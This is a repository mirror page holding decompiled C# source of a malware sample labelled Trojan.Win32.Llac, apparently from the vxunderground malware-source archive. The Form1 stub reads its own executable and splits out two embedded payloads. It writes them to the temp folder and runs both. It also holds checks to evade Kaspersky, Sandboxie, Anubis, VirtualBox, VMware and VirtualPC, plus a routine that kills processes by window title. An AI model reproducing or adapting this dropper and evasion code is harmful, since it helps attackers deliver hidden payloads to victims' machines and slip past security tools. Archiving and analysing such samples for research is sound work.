ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 09:56:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
f2ac1ece55
MalwareSourceCode/MSIL/Trojan/Win32/L/Trojan.Win32.Llac.lqpj-3f6ac9dfded1ed0e4c086ec75e7c0ca5a7edfa21307d3cb5a21e884ebe389389/Stub/Form1.cs
vxunderground f2ac1ece55 auto-decompiled msil via petikvx 
add
2022-08-18 06:28:56 -05:00

452 lines
12 KiB
C#
Raw Blame History

// Decompiled with JetBrains decompiler
// Type: Stub.Form1
// Assembly: Stub, Version=4.9.5.9, Culture=neutral, PublicKeyToken=null
// MVID: 2229516C-329C-43F8-8C26-63983DECBF21
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Llac.lqpj-3f6ac9dfded1ed0e4c086ec75e7c0ca5a7edfa21307d3cb5a21e884ebe389389.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Runtime.CompilerServices;
using System.Windows.Forms;
namespace Stub
{
[DesignerGenerated]
public class Form1 : Form
{
private IContainer \u0002;
private object \u0003;
private string \u0005;
private string \u0008;
private RegistryKey \u0006;
private object \u000E;
private string \u000F;
public Form1()
{
this.Load += new EventHandler(this.\u0002);
this.\u0008 = \u000E.\u0002(-374349334);
this.\u0006 = Registry.LocalMachine.OpenSubKey(\u000E.\u0002(-374349564), false);
this.\u000E = RuntimeHelpers.GetObjectValue(this.\u0006.GetValue(\u000E.\u0002(-374349481)));
this.\u000F = \u000E.\u0002(-374349497);
this.\u0002();
}
[DebuggerNonUserCode]
protected override void Dispose(bool disposing)
{
try
{
if (!disposing || this.\u0002 == null)
return;
this.\u0002.Dispose();
}
finally
{
base.Dispose(disposing);
}
}
[DebuggerStepThrough]
private void \u0002()
{
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(284, 262);
this.Name = \u000E.\u0002(-374349467);
this.Text = \u000E.\u0002(-374349467);
this.ResumeLayout(false);
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
private void \u0002(object _param1, EventArgs _param2)
{
label_0:
int num1;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 1;
label_1:
int num3 = 2;
string tempPath = Path.GetTempPath();
label_2:
num3 = 3;
FileSystem.FileOpen(1, Application.ExecutablePath, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared);
label_3:
num3 = 4;
string Expression = Strings.Space(checked ((int) FileSystem.LOF(1)));
label_4:
num3 = 5;
FileSystem.FileGet(1, ref Expression);
label_5:
num3 = 6;
FileSystem.FileClose(1);
label_6:
num3 = 7;
string[] strArray = Strings.Split(Expression, \u000E.\u0002(-374349679));
label_7:
num3 = 8;
FileSystem.FileOpen(3, tempPath + strArray[3], OpenMode.Binary, OpenAccess.ReadWrite);
label_8:
num3 = 9;
FileSystem.FilePut(3, strArray[1], -1L, false);
label_9:
num3 = 10;
FileSystem.FileClose(3);
label_10:
num3 = 11;
FileSystem.FileOpen(5, tempPath + strArray[4], OpenMode.Binary, OpenAccess.ReadWrite);
label_11:
num3 = 12;
FileSystem.FilePut(5, strArray[2], -1L, false);
label_12:
num3 = 13;
FileSystem.FileClose(5);
label_13:
num3 = 14;
Process.Start(tempPath + strArray[3]);
label_14:
num3 = 15;
Process.Start(tempPath + strArray[4]);
label_15:
num3 = 16;
this.Close();
ProjectData.EndApp();
goto label_22;
label_17:
num2 = num3;
switch (num1)
{
case 1:
int num4 = num2 + 1;
num2 = 0;
switch (num4)
{
case 1:
goto label_0;
case 2:
goto label_1;
case 3:
goto label_2;
case 4:
goto label_3;
case 5:
goto label_4;
case 6:
goto label_5;
case 7:
goto label_6;
case 8:
goto label_7;
case 9:
goto label_8;
case 10:
goto label_9;
case 11:
goto label_10;
case 12:
goto label_11;
case 13:
goto label_12;
case 14:
goto label_13;
case 15:
goto label_14;
case 16:
goto label_15;
case 17:
goto label_22;
}
break;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_17;
}
throw ProjectData.CreateProjectError(-2146828237);
label_22:
if (num2 == 0)
return;
ProjectData.ClearProjectError();
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public bool antiKAV()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
flag = Process.GetProcessesByName(\u000E.\u0002(-374349682)).Length >= 1;
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
ProjectData.EndApp();
goto label_7;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
int num3 = flag ? 1 : 0;
if (num2 == 0)
return num3 != 0;
ProjectData.ClearProjectError();
return num3 != 0;
}
private void \u0003()
{
Process[] processes = Process.GetProcesses();
int index = 0;
while (index < processes.Length)
{
Process process = processes[index];
if (string.Equals(process.MainWindowTitle, \u000E.\u0002(-374349640)))
process.Kill();
checked { ++index; }
}
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public bool antiSandboxie()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
flag = Process.GetProcessesByName(\u000E.\u0002(-374349603)).Length >= 1;
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
ProjectData.EndApp();
goto label_7;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
int num3 = flag ? 1 : 0;
if (num2 == 0)
return num3 != 0;
ProjectData.ClearProjectError();
return num3 != 0;
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public bool antiAnubis()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
flag = Operators.CompareString(Application.ExecutablePath, Application.StartupPath + \u000E.\u0002(-374349621), false) == 0;
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
ProjectData.EndApp();
goto label_7;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
int num3 = flag ? 1 : 0;
if (num2 == 0)
return num3 != 0;
ProjectData.ClearProjectError();
return num3 != 0;
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public bool antiAnubis2()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
flag = Operators.ConditionalCompareObjectEqual(this.\u000E, (object) this.\u000F, false);
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
ProjectData.EndApp();
goto label_7;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
int num3 = flag ? 1 : 0;
if (num2 == 0)
return num3 != 0;
ProjectData.ClearProjectError();
return num3 != 0;
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public bool AntiVirtualBox()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
this.\u0005();
flag = Operators.CompareString(this.\u0005, \u000E.\u0002(-374349571), false) == 0;
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
ProjectData.EndApp();
goto label_7;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
int num3 = flag ? 1 : 0;
if (num2 == 0)
return num3 != 0;
ProjectData.ClearProjectError();
return num3 != 0;
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public bool AntiVmWare()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
this.\u0005();
flag = Operators.CompareString(this.\u0005, \u000E.\u0002(-374349793), false) == 0;
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
ProjectData.EndApp();
goto label_7;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
int num3 = flag ? 1 : 0;
if (num2 == 0)
return num3 != 0;
ProjectData.ClearProjectError();
return num3 != 0;
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
public bool AntiVirtualPC()
{
int num1;
bool flag;
int num2;
try
{
ProjectData.ClearProjectError();
num1 = 2;
this.\u0005();
flag = Operators.CompareString(this.\u0005, \u000E.\u0002(-374349820), false) == 0;
goto label_7;
label_2:
num2 = -1;
switch (num1)
{
case 2:
ProjectData.EndApp();
goto label_7;
}
}
catch (Exception ex) when (ex is Exception & num1 != 0 & num2 == 0)
{
ProjectData.SetProjectError(ex);
goto label_2;
}
throw ProjectData.CreateProjectError(-2146828237);
label_7:
int num3 = flag ? 1 : 0;
if (num2 == 0)
return num3 != 0;
ProjectData.ClearProjectError();
return num3 != 0;
}
[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]
private void \u0005()
{
// ISSUE: unable to decompile the method.
}
}
}
Reference in New Issue View Git Blame Copy Permalink